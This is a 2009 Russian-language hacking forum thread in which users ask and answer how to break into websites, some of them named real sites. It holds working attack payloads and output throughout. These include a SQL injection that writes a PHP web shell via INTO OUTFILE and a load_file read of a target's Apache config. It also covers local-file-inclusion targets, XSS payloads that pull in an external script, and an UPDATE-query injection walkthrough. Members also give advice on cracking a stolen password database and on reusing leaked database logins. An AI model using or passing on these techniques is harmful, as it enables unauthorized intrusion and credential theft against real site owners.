Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    что за бд?

    Если Oracle там можно использовать конструкции по типу
    Update table set column=(select user from dual)
     
    #10461 [ DSU ], 4 Dec 2009
    Last edited: 4 Dec 2009
    1 person likes this.
  2. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    коротко:

    File_Priv: Y
    magic_quotes_off
    Сервер:Apache/2.2.3 (Red Hat)
    проблема: немогу раскрыть путь...

    конструкция:
    http://www.gsmtrack.nl/index.php?page[]=
    недала нефига(

    http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+'%3C?php%20system($_GET['cmd']);%20?%3E'+into+outfile+'/var/www/'--

    тут понятно тоже што нефига невыйшло так как путь.....

    вообщем вся загвоздка в том што немогу путь раскрыть и (или) загрузить конфиги хотябы)...
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')--
    
    
    <VirtualHost 213.206.88.15:80>
    ServerName www.gsmtrack.nl
    ServerAdmin [email protected]
    DocumentRoot /opt/guide/www.gsmtrack.nl/HTML
    
     
    1 person likes this.
  4. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    прикол) я пробовал так...
    http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')/*
    и у меня нераскрылось) спасибо!

    но к сожалению
    /opt/guide/www.gsmtrack.nl/HTML закрыт на запись из веба и /var/www/html тоже...

    ты путь по конфигу вычислил?
     
  5. schwarze

    schwarze Member

    Joined:
    1 Dec 2008
    Messages:
    64
    Likes Received:
    38
    Reputations:
    5
    Вопрос такой:
    Windows. Xampp, Mysql
    Php-inj include($file.".php")
    Инклудить пхп файлы (конфиги) никакого эффекта не дает - они интерпретируются.
    Инклудить логи не возможно - они настолько велики, что страница не успевает "показаться" за 600 секунд. (даже error.log)
    И сам вопрос - чтоб такое проинклудить?!
     
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Если allow_url_include, то
    Code:
    http://google.com/?
    Если нет, то
    Code:
    /proc/self/environ
    Или автарки форумов, и тд...
    Об этом уже писалось тут...
     
    1 person likes this.
  7. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    Есть 2 таблицы в бд с максимальным размером в 20 символов в каждой, вывод с них нефильтруеться т.е. если я в одну таблицу помешяю <script>alert('x')// а во 2 </script>
    в итоге я получаю алерт а в сурсе я вижу такое
    Code:
    <script>alert('x')// (Password: </script>
    
    мож нает какой вариант прокатит в этом случае, придумал разбивать скрипт и коментить левое выходит примерно так:
    Code:
    <script src="http:/* (Password: *///1.ru:73/1.js">
    
    но скрипт то невыполняеться при таких условиях :(
     
  8. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    слил файлик spwd.db

    чем посоветуете выдрать логины и пароли и чем их лучше брутить??


    З.Ы. если есть брутер для GPU типа PasswordsPro с лекарством, скиньте плиз ссылку в пм
     
  9. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Так попробуй:
    <script src="http:<!-- (Password: -->//1.ru:73/1.js">
     
  10. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    если в JETDATABASE DRIVER есть скул на http header можно ли произвести инъекцию каким нибудь прогой? Например на referrer
     
  11. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Уважаемые Гуру, есть у меня один ну почти ламерский, расстраивающий меня вопрос. Нашел на сайте чтение файлов через readfile хочу шелл. Вначале о хорошем - уязвимость выводит и списки файлов в директориях.
    Теперь о плохом. Во первых настройки пхп читать все что в голову взбредет не позволяют, только из нескольких папок. На сайте довольно много субдоменов но все абсолютно однотипные(кроме парочки). Нашел пхп скрипты с паролями-явками от БД - с наружи подключиться нельзя, других сайтов на сервере нету. Почитал несколько пхп файлов, но и в них ничего интереснее хсс пассивной не нашел. Теперь творческий кризис - не продолжать же методом научного тыка читать все файлы и искать инклюд или иньекцию, может есть какие-то другие варианты?
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Конфиги с явками и паролями, тыкать пароли на всё что можно или искать баги позволяющие сделать что-то более существенное в коде.
    Тоесть простая читалка без дополнений не даст тебе ничего кроме очевидного -- чтения файлов.

    Ищи админки, пыхадмины, возможно пароль от админки не в базе а в файле, тогда туда можно попасть, в пыхадмин тоже можно попасть пасс к БД у тебя есть, вопрос какая там авторизация стоит. Ну и т.д.

    Вобщем читай )
     
  13. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Про пхпмайадмин спасибо, вот это я точно запамятовал. Пока не нашел его, но мб мне повезет. Зато уже третий набор логин-пароль от БД нашел. Есть еще надежда найти sql иньекцию - ибо судя по другим скриптам, те, кто писали этот сайт оч верят в intval. Буду продолжать искать, чую логи у сервера сегодня хорошо разрастутся. Надо попробовать еще с этими пассами по фтп подключаться, вдруг повезет.
     
  14. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    К сожалению mysql... Есть какие-нибудь другие способы вывести данные?)
     
    #10474 [R]eD, 5 Dec 2009
    Last edited: 5 Dec 2009
  15. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    почему к сожалению?
     
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Очень просто, к примеру запрос:
    Code:
    ...
    mysql_query("UPDATE `news` SET `title` = '".$_POST['title']."', 'text' = '".$_POST['text']."' ");
    ...
    При вводе
    Title
    Code:
    test title
    Text:
    Code:
    test text
    запрос в БД будет

    Code:
    UPDATE `news` SET `title` = '[B][COLOR=Red]test title[/COLOR][/B]',  `text` = '[COLOR=Red][B]test text[/B][/COLOR]'
    Если же сделать такой ввод:
    Title
    Code:
    test title', `text` = concat_ws(0x3a,user(),database(),version())/*
    Text:
    Code:
    test text
    В БД пойдет запрос:

    Code:
    UPDATE `news` SET `title` = '[B][COLOR=Red]test title[/COLOR][/B]', `text` = [B][COLOR=Red]concat_ws(0x3a,user(),database(),version())[/COLOR][/B][COLOR=DimGray]/*', `text` = 'test text'[/COLOR]
    И в тексте новости будет юзер, бд и версия.

    PS: Это будет работать при magic_qoutes = Off.
     
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Почему у него в запрос должны стать кавычки? Откуда они взялись там?
     
    1 person likes this.
  18. ZaraZ

    ZaraZ Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    51
    Likes Received:
    17
    Reputations:
    4
    Как можно сделать в булке/ipb кол-во сообщений отрицательным(-1)?
     
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Причем здесь уязвимости?
     
  20. Cybersteger

    Cybersteger Member

    Joined:
    9 Oct 2009
    Messages:
    40
    Likes Received:
    13
    Reputations:
    15
    В поле http://www.site.ru/pop/search.cgi?q='

    Software error:

    DBD::mysql::db selectrow_array failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1 at /usr/local/apache/htdocs/pop/search.cgi line 111.

    Это SQL инекция ? Тогда как раскрутить?
     
Thread Status:
Not open for further replies.